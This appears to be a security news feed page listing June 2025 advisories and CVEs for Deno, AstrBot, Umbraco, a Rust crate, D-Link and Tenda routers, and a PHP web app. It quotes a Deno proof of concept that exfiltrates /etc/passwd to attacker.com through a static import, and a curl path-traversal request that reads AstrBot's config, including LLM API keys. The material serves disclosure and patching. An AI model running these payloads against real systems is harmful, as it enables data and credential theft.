![]() |
Description: Affected versions append root to group listings, unless the correct listing has exactly 1024 groups.
This affects both:
The supplementary groups of a user
The group access list of the current process
If the caller uses this information for access control, this may lead to privilege escalation.
This crate is not currently maintained, so a patched version is not available.
Versions older than 0.8.0 do not contain the affected functions, so downgrading to them is a workaround.
Recommended alternatives
uzers (an actively maintained fork of the users crate)
sysinfo
References
https://github.com/ogham/rust-users/issues/44
https://rustsec.org/advisories/RUSTSEC-2025-0040.html
https://github.com/advisories/GHSA-m65q-v92h-cm7q
June 5th, 2025 (4 days ago)
|
![]() |
Description: Summary
Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.
Details
Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways, when third-party code is directly/indirectly executed with deno run:
The simplest payload would be a tracking pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
When --allow-write and --allow-read permissions are given, an attacker can perform a sophisticated two-steps attack: first, they generate a ts/js file containing a static import and in a second execution load this static file.
PoC
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
let pre =
'import {foo} from "[https://attacker.com?val=](https://attacker.com/?val=)' +
encodeURIComponent(passFile) + '";\n';
await Deno.writeTextFile(__filename, pre + oldContent);
Executing a file containing this payload twice, with deno run --allow-read --allow-write would cause the password file to leak on the network, even though no network permission was granted.
This vulnerability was fixed with the addition of the --allow-import flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
References
https://github.com/denoland/deno/security/advisories/GHSA-jv4x...
June 5th, 2025 (4 days ago)
|
![]() |
Description: The FTC's Andrew Ferguson called on Congress to update federal law to get rid of exceptions for tech firms that handle children's data.
June 5th, 2025 (4 days ago)
|
CVE-2025-5621 |
Description: A vulnerability has been found in D-Link DIR-816 1.10CNB05 and classified as critical. Affected by this vulnerability is the function qosClassifier of the file /goform/qosClassifier. The manipulation of the argument dip_address/sip_address leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. In D-Link DIR-816 1.10CNB05 wurde eine Schwachstelle gefunden. Sie wurde als kritisch eingestuft. Betroffen ist die Funktion qosClassifier der Datei /goform/qosClassifier. Mittels dem Manipulieren des Arguments dip_address/sip_address mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung.
CVSS: HIGH (7.3) EPSS Score: 0.24%
June 5th, 2025 (4 days ago)
|
CVE-2025-5620 |
Description: A vulnerability, which was classified as critical, was found in D-Link DIR-816 1.10CNB05. Affected is the function setipsec_config of the file /goform/setipsec_config. The manipulation of the argument localIP/remoteIP leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. Es wurde eine Schwachstelle in D-Link DIR-816 1.10CNB05 gefunden. Sie wurde als kritisch eingestuft. Hiervon betroffen ist die Funktion setipsec_config der Datei /goform/setipsec_config. Durch Manipulation des Arguments localIP/remoteIP mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung.
CVSS: MEDIUM (6.9) EPSS Score: 0.24%
June 5th, 2025 (4 days ago)
|
CVE-2025-5619 |
Description: A vulnerability, which was classified as critical, has been found in Tenda CH22 1.0.0.1. This issue affects the function formaddUserName of the file /goform/addUserName. The manipulation of the argument Password leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Eine Schwachstelle wurde in Tenda CH22 1.0.0.1 entdeckt. Sie wurde als kritisch eingestuft. Davon betroffen ist die Funktion formaddUserName der Datei /goform/addUserName. Durch die Manipulation des Arguments Password mit unbekannten Daten kann eine stack-based buffer overflow-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung.
CVSS: HIGH (8.7) EPSS Score: 0.12%
June 5th, 2025 (4 days ago)
|
CVE-2025-5618 |
Description: A vulnerability classified as critical was found in PHPGurukul Online Fire Reporting System 1.2. This vulnerability affects unknown code of the file /admin/edit-team.php. The manipulation of the argument teamid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. In PHPGurukul Online Fire Reporting System 1.2 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /admin/edit-team.php. Mit der Manipulation des Arguments teamid mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung.
CVSS: MEDIUM (5.3) EPSS Score: 0.03%
June 5th, 2025 (4 days ago)
|
![]() |
Description: Impact
This vulnerability may lead to:
Information disclosure, such as API keys for LLM providers, account passwords, and other sensitive data.
Reproduce
Follow these steps to set up a test environment for reproducing the vulnerability:
Install dependencies and clone the repository:
pip install uv
git clone https://github.com/AstrBotDevs/AstrBot && cd AstrBot
uv run main.py
Alternatively, deploy the program via pip:
mkdir astrbot && cd astrbot
uvx astrbot init
uvx astrbot run
In another terminal, run the following command to exploit the vulnerability:
curl -L http://0.0.0.0:6185/api/chat/get_file?filename=../../../data/cmd_config.json
This request will read the cmd_config.json config file, leading to the leakage of sensitive data such as LLM API keys, usernames, and password hashes (MD5).
Patches
The vulnerability has been addressed in Pull Request #1676 and is included in versions >= v3.5.13. All users are strongly encouraged to upgrade to v3.5.13 or later.
Workarounds
Users can edit the cmd_config.json file to disable the dashboard feature as a temporary workaround. However, it is strongly recommended to upgrade to version v3.5.13 or later as soon as possible to fully resolve this issue.
References
Pull Request #1676
Issue #1675
References
https://github.com/AstrBotDevs/AstrBot/security/advisories/GHSA-cq37-g2qp-3c2p
https://nvd.nist.gov/vuln/detail/CVE-2025-48957
https://github.com/AstrBotDevs/AstrBot/issues/1675
https://github.com/AstrBotDevs/AstrBot/pull/...
CVSS: HIGH (7.5) EPSS Score: 0.07%
June 5th, 2025 (4 days ago)
|
![]() |
Description: Impact
Via a manipulated API request it's possible to upload a file that doesn't adhere with the configured allowable file extensions.
Patches
Patched in 15.4.2 and 16.0.0.
Workarounds
None available.
References
https://github.com/umbraco/Umbraco-CMS/security/advisories/GHSA-fr6r-p8hv-x3c4
https://nvd.nist.gov/vuln/detail/CVE-2025-48953
https://github.com/umbraco/Umbraco-CMS/commit/d920e93d1ee29dc3301697e444f53e8cd5db3cf9
https://github.com/advisories/GHSA-fr6r-p8hv-x3c4
CVSS: MEDIUM (5.5) EPSS Score: 0.03%
June 5th, 2025 (4 days ago)
|
![]() |
June 4th, 2025 (4 days ago)
|